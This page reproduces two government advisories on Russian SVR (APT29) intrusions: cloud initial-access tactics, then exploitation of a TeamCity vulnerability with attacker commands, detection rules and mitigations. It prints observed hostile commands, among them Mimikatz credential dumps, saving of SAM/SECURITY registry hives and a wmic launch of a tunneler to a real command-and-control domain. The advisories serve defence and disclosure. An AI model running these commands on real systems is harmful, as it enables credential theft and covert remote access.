Tag Archive for: SVR

SVR Cyber Actors Adapt Tactics for Initial Cloud Access


How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure

OVERVIEW

This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.

The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.

This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.

To download the PDF version of this report, click here.

PREVIOUS ACTOR ACTIVITY

The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

SVR actors are also known for:

EVOLVING TTPs

As organizations continue to modernize their systems and move to cloud-based infrastructure, the SVR has adapted to these changes in the operating environment.

They have to move beyond their traditional means of initial access, such as exploiting software vulnerabilities in an on-premises network, and instead target the cloud services themselves.

To access the majority of the victims’ cloud hosted network, actors must first successfully authenticate to the cloud provider. Denying initial access to the cloud environment can prohibit SVR from successfully compromising their target. In contrast, in an on-premises system, more of the network is typically exposed to threat actors.

Below describes in more detail how SVR actors are adapting to continue their cyber operations for intelligence gain. These TTPs have been observed in the last 12 months.

ACCESS VIA SERVICE AND DORMANT ACCOUNTS

Previous SVR campaigns reveal the actors have successfully used brute forcing [T1110] and password spraying to access service accounts. This type of account is typically used to run and manage applications and services. There is no human user behind them so they cannot be easily protected with multi-factor authentication (MFA), making these accounts more susceptible to a successful compromise. Service accounts are often also highly privileged depending on which applications and services they’re responsible for managing. Gaining access to these accounts provides threat actors with privileged initial access to a network, to launch further operations.

SVR campaigns have also targeted dormant accounts belonging to users who no longer work at a victim organization but whose accounts remain on the system [T1078.004].

Following an enforced password reset for all users during an incident, SVR actors have also been observed logging into inactive accounts and following instructions to reset the password. This has allowed the actor to regain access following incident response eviction activities.

CLOUD-BASED TOKEN AUTHENTICATION

Account access is typically authenticated by either username and password credentials or system-issued access tokens. The NCSC and partners have observed SVR actors using tokens to access their victims’ accounts, without needing a password [T1528].

The default validity time of system-issued tokens varies dependent on the system; however, cloud platforms should allow administrators to adjust the validity time as appropriate for their users. More information can be found on this in the mitigations section of this advisory.

ENROLLING NEW DEVICES TO THE CLOUD

On multiple occasions, the SVR have successfully bypassed password authentication on personal accounts using password spraying and credential reuse. SVR actors have also then bypassed MFA through a technique known as “MFA bombing” or “MFA fatigue,” in which the actors repeatedly push MFA requests to a victim’s device until the victim accepts the notification [T1621].

Once an actor has bypassed these systems to gain access to the cloud environment, SVR actors have been observed registering their own device as a new device on the cloud tenant [T1098.005]. If device validation rules are not set up, SVR actors can successfully register their own device and gain access to the network.

By configuring the network with device enrollment policies, there have been instances where these measures have defended against SVR actors and denied them access to the cloud tenant.

RESIDENTIAL PROXIES

As network-level defenses improve detection of suspicious activity, SVR actors have looked at other ways to stay covert on the internet. A TTP associated with this actor is the use of residential proxies [T1090.002]. Residential proxies typically make traffic appear to originate from IP addresses within internet service provider (ISP) ranges used for residential broadband customers and hide the true source. This can make it harder to distinguish malicious connections from typical users. This reduces the effectiveness of network defenses that use IP addresses as indicators of compromise, and so it is important to consider a variety of information sources such as application and host-based logging for detecting suspicious activity.

CONCLUSION

The SVR is a sophisticated actor capable of carrying out a global supply chain compromise such as the 2020 SolarWinds, however the guidance in this advisory shows that a strong baseline of cyber security fundamentals can help defend from such actors.

For organizations that have moved to cloud infrastructure, a first line of defense against an actor such as SVR should be to protect against SVR’s TTPs for initial access. By following the mitigations outlined in this advisory, organizations will be in a stronger position to defend against this threat.

Once the SVR gain initial access, the actor is capable of deploying highly sophisticated post compromise capabilities such as MagicWeb, as reported in 2022. Therefore, mitigating against the SVR’s initial access vectors is particularly important for network defenders.

CISA have also produced guidance through their Secure Cloud Business Applications (SCuBA) Project which is designed to protect assets stored in cloud environments.

Some of the TTPs listed in this report, such as residential proxies and exploitation of system accounts, are similar to those reported as recently as January 2024 by Microsoft.

MITRE ATT&CK®

This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

Tactic ID Technique Procedure

Credential Access

T1110

Brute Force

The SVR use password spraying and brute forcing as an initial infection vector.

Initial Access

T1078.004

Valid Accounts: Cloud Accounts

The SVR use compromised credentials to gain access to accounts for cloud services, including system and dormant accounts.

Credential Access

T1528

Steal Application Access Token

The SVR use stolen access tokens to login to accounts without the need for passwords.

Credential Access

T1621

Multi-Factor Authentication Request Generation

The SVR repeatedly push MFA requests to a victim’s device until the victim accepts the notification, providing SVR access to the account.

Command and Control

T1090.002

Proxy: External Proxy

The SVR use open proxies in residential IP ranges to blend in with expected IP address pools in access logs.

Persistence

T1098.005

Account Manipulation: Device Registration

The SVR attempt to register their own device on the cloud tenant after acquiring access to accounts.

MITIGATION AND DETECTION

A number of mitigations will be useful in defending against the activity described in this advisory: 

  • Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises. See NCSC guidance: Multifactor Authentication for Online Services and Setting up 2-Step Verification (2SV).
  • Accounts that cannot use 2SV should have strong, unique passwords. User and system accounts should be disabled when no longer required with a “joiners, movers, and leavers” process in place and regular reviews to identify and disable inactive/dormant accounts. See NCSC guidance: 10 Steps to Cyber Security.
  • System and service accounts should implement the principle of least privilege, providing tightly scoped access to resources required for the service to function.
  • Canary service accounts should be created which appear to be valid service accounts but are never used by legitimate services. Monitoring and alerting on the use of these account provides a high confidence signal that they are being used illegitimately and should be investigated urgently.
  • Session lifetimes should be kept as short as practical to reduce the window of opportunity for an adversary to use stolen session tokens. This should be paired with a suitable authentication method that strikes a balance between regular user authentication and user experience.
  • Ensure device enrollment policies are configured to only permit authorized devices to enroll. Use zero-touch enrollment where possible, or if self-enrollment is required then use a strong form of 2SV that is resistant to phishing and prompt bombing. Old devices should be prevented from (re)enrolling when no longer required. See NCSC guidance: Device Security Guidance.
  • Consider a variety of information sources such as application events and host-based logs to help prevent, detect and investigate potential malicious behavior. Focus on the information sources and indicators of compromise that have a better rate of false positives. For example, looking for changes to user agent strings that could indicate session hijacking may be more effective than trying to identify connections from suspicious IP addresses. See NCSC guidance: Introduction to Logging for Security Purposes.

DISCLAIMER

This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.

This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.

Refer any FOIA queries to [email protected].

All material is UK Crown Copyright.

Source…

Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally


SUMMARY

The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.

Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.

To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to the FBI and CISA.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

THREAT OVERVIEW

SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.

A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing operations are visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.

Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although not listed in the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.

In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, exploitation of a zero-day exploit, and exploitation of Microsoft 365 cloud environments.

In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While SVR followed a similar playbook in each compromise, they also adjusted to each operating environment and not all presented steps or actions below were executed on every host.

Initial Access – Exploitation

The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing authorization, resulting in arbitrary code execution on the server. The authoring agencies’ observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity currently being exploited by the SVR.

Host Reconnaissance

Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:

  • whoami /priv
  • whoami /all
  • whoami /groups
  • whoami /domain
  • nltest -dclist
  • nltest -dsgetdc
  • tasklist
  • netstat
  • wmic /node:””<redacted>”” /user:””<redacted>”” /password:””<redacted>”” process list brief
  • wmic /node:””<redacted>”” process list brief
  • wmic process get commandline -all
  • wmic process <proc_id> get commandline
  • wmic process where name=””GoogleCrashHandler64.exe”” get commandline,processed
  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties
  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties.memberof
  • powershell Get-WmiObject -Class Win32_Service -Computername
  • powershell Get-WindowsDriver -Online -All

File Exfiltration

Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide insight into the host system’s operating system:

  • C:\Windows\system32\ntoskrnl.exe to precisely identify system version, likely as a prerequisite to deploy EDRSandBlast.
  • SQL Server executable files – based on the review of the post exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems:
    • C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll,
    • C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll,
    • C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll,
    • C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll
    • C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll
  • Visual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in specific files of the Visual Studio:
    • C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe
    • Update management agent files – based on the review of the post exploitation actions, the SVR showed an interest in executables and configuration of patch management software:
      • C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe
      • C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd
      • C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf

Interest in SQL Server

Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:

  • powershell Compress-Archive -Path “C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll”,”C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll”,”C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll”,”C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll” -DestinationPath C:\Windows\temp\1\sql.zip
  • SVR cyber actors also exfiltrated secforwarder.dll

Tactics Used to Avoid Detection

To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].

This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (i.e. Mimikatz) were executed in memory [T1003.001].

In several cases SVR attempted to hide their backdoors via:

  • Abusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with their one containing GraphicalProton backdoor,
  • Backdooring an open source application developed by Microsoft named vcperf. SVR modified and copied publicly available sourcecode. After execution, backdoored vcperf dropped several DLLs to disc, one of those being a GraphicalProton backdoor,
  • Abusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with one containing GraphicalProton backdoor.

To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564], illustrated below:

Privilege Escalation

To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.

The SVR modified the NoLMHash registry using the following reg command:

  • reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d “0” /f

The SVR used the following Mimikatz commands [T1003]:

  • privilege::debug
  • lsadump::cache
  • lsadump::secrets
  • lsadump::sam
  • sekurlsa::logonpasswords

Persistence

The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, their executables were stored in one of following directories:

  • C:\Windows\temp
  • C:\Windows\System32
  • C:\Windows\WinStore

The SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed to schtasks.exe, which can be found in Appendix B – Indicators of Compromise.

To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].

Sensitive Data Exfiltration [T1020]

The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:

  • HKLM\SYSTEM
  • HKLM\SAM
  • HKLM\SECURITY

In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the C:\Windows\Temp\ directory.

  • reg save HKLM\SYSTEM “”C:\Windows\temp\1\sy.sa”” /y
  • reg save HKLM\SAM “”C:\Windows\temp\1\sam.sa”” /y
  • reg save HKLM\SECURITY “”C:\Windows\temp\1\se.sa”” /y
  • powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q

In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.

SVR also used DSInternals open source tool to interact with Directory Services. DSInternals allows to obtain a sensitive Domain information.

Network Reconnaissance

After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:

  • Get-NetComputer
  • Get-NetGroup
  • Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount”
  • Get-NetDiDomain
  • Get-AdUser
  • Get-DomainUser -UserName
  • Get-NetUser -PreauthNotRequire
  • Get-NetComputer | select samaccountname
  • Get-NetUser -SPN | select serviceprincipalname

Tunneling into Compromised Environments

In selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].

The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:

  • 65.20.97[.]203:443
  • Poetpages[.]com:8443

The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:

  • wmic process call create “C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31”

Lateral Movement

The SVR used WMIC to facilitate lateral movement [T1047],[T1210].

  • wmic /node:””<redacted>”” /user:””<redacted>” /password:””<redacted>”” process call create “”rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost””

The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210].

It modified Registry using the following reg command:

  • reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d “0” /f

Adversary Toolset

In the course of the TeamCity operation, the SVR used multiple custom and open source available tools and backdoors. The following custom tools were observed in use during the operation:

  • GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.
  • After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files – with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.
  • BMP files that were used to exchange data were generated in the following way:
  1. Compress data using zlib,
  2. Encrypt data using custom algorithm,
  3. Add “***” string literal to encrypted data,
  4. Create a random BMP with random rectangle,
  5. And finally, encode encrypted data within lower pixel bits.

While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.

  • GraphicalProton HTTPS variant – a variant of GraphicalProton backdoor recently introduced by the SVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP request.
    To legitimize the C2 channel, SVR used a re-registered expired domain set up with dummy WordPress website. Execution of HTTPS variant of GraphicalProton is split into two files – stager and encrypted binary file that contains further code.

MITRE ATT&CK TACTICS AND TECHNIQUES

See below tables for all referenced threat actor tactics and techniques in this advisory. For additional mitigations, see the Mitigations section.

Table 1: SVR Cyber Actors ATT&CK Techniques for Enterprise – Reconnaissance
Technique Title ID Use

Gather Victim Network Information: Network Topology

T1590.004

SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.

Gather Victim Host Information: Software

T1592.002

SVR cyber actors may gather information about the victim’s host networks that can be used during targeting.

Table 2: SVR Cyber Actors’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title ID Use

Exploit Public-Facing Application

T1190

SVR cyber actors exploit internet-connected JetBrains TeamCity server using CVE-2023-42793 for initial access.

Table 3: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Execution
Technique Title ID Use

Command and Scripting Interpreter: PowerShell

T1059.001

SVR cyber actors used powershell commands to compress Microsoft SQL server .dll files.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

SVR cyber actors execute these powershell commands to perform host reconnaissance:

  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties
  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties.memberof
  • powershell Get-WmiObject -Class Win32_Service -Computername
  • powershell Get-WindowsDriver -Online -All

Exploitation for Client Execution

T1203

SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.

Hijack Execution Flow: DLL Side-Loading

T1574.002

SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.

Table 4: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Persistence
Technique Title ID Use

Scheduled Task

T1053.005

SVR cyber actors may abuse Windows Task Schedule to perform task scheduling for initial or recurring execution of malicious code.

Server Software Component: SQL Stored Procedures

T1505.001

SVR cyber actors abuse SQL server stored procedures to maintain persistence.

Boot or Logon Autostart Execution

T1547

SVR cyber actors used C:\Windows\system32\ntoskrnl.exe to configure automatic system boot settings to maintain persistence.

Table 5: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Privilege Escalation
Technique Title ID Use

Exploitation for Privilege Escalation

T1068

SVR cyber actors exploit JetBrains TeamCity vulnerability to achieve escalated privileges.

To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver”  technique to disable EDR and AV defense mechanisms.

Account Manipulation

T1098

SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.

Table 6: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Defense Evasion
Technique Title ID Use

Obfuscated Files or Information: Binary Padding

T1027.001

SVR cyber actors use BMPs to perform binary padding while exchange data is exfiltrated to an their C2 station.

Masquerading

T1036

SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.

Process Injection

T1055

SVR cyber actors inject code into AV and EDR processes to evade defenses.

Disable or Modify Tools

T1562.001

SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.

Hide Artifacts

T1564

SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.

Hide Artifacts: Hidden Files and Directories

T1564.001

When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files – with both commands and results.

Table 7: SVR Cyber actors’ ATT&CK Techniques for Enterprise: Credential Access
Technique Title ID Use

OS Credential Dumping: LSASS Memory

T1003.001

SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.

OS Credential Dumping: Security Account Manager

T1003.002

SVR cyber actors used:

  • privilege::debug
  • lsadump::cache
  • lsadump::secrets
  • lsadump::sam
  • sekurlsa::logonpasswords

Mimikatz commands to gain access to credentials.

Additionally, SVR cyber actors exfiltrated Windows registry hives to steal credentials.

  • HKLM\SYSTEM
  • HKLM\SAM
  • HKLM\SECURITY

Credentials from Password Stores: Credentials from Web Browsers

T1555.003

In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.

Steal or Forge Kerberos Tickets: Golden Ticket

T1558.001

To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).

Table 8: SVR Cyber Actors ATT&CK Techniques for Enterprise: Discovery
Technique Title ID Use

System Owner/User Discovery

T1033

SVR cyber actors use these built-in commands to perform host reconnaissance: whoami /priv, whoami / all, whoami / groups, whoami / domain to perform user discovery.

Network Service Discovery T1046 SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit.

Process Discovery

T1057

SVR cyber actors use GraphicalProton to gather running processes data.

Gather Victim Network Information

T1590

SVR cyber actors use GraphicalProton to gather victim network information.

Table 9: SVR Cyber Actors ATT&CK Techniques for Enterprise: Lateral Movement
Technique Title ID Use

Exploitation of Remote Services

T1210

SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.

Windows Management Instrumentation

T1047

SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads.

wmic process call create “C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31”

Table 10: SVR Cyber Actors ATT&CK Techniques for Enterprise: Command and Control
Technique Title ID Use

Dynamic Resolution

T1568

SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.

Protocol Tunneling

T1572

SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.

In selected environments, the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstunm—to establish a tunnel to the C2 infrastructure.

Table 11: SVR Cyber Actors ATT&CK Techniques for Enterprise: Exfiltration
Technique Title ID Use

Automated Exfiltration

T1020

SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection.

Exfiltration Over C2 Channel

T1041

SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.

Exfiltration Over Web Service

T1567

SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station.

INDICATORS OF COMPROMISE

Note: Please refer to Appendix B for a list of IOCs.

VICTIM TYPES

As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.

DETECTION METHODS

The following rules can be used to detect activity linked to adversary activity. These rules should serve as examples and adapt to each organization’s environment and telemetry.

SIGMA Rules

title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author: 
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
          - 'whoami.exe'
        CommandLine|contains:
          - 'priv'
          - 'PRIV'
    condition: selection
falsepositives: legitimate use by system administrator

title: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author: 
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
          - 'nltest.exe'
        CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
    condition: selection
falsepositives: legitimate use by system administrator

title: DLL execution via WMI
description: Detects DLL execution via WMI
author: 
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
          - 'WMIC.exe'
        CommandLine|contains|all:
          - 'call'
          - 'rundll32'
    condition: selection
falsepositives: legitimate use by software or system administrator

title: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
          - 'pass'
          - 'connect'
    condition: selection
falsepositives: legitimate use of rsockstun or software with exact same arguments

title: Service or Drive enumeration via powershell
description: Service or Drive enumeration via powershell 
author: 
references:
date: 2023/11/15
logsource:
    category: ps_script
    product: windows
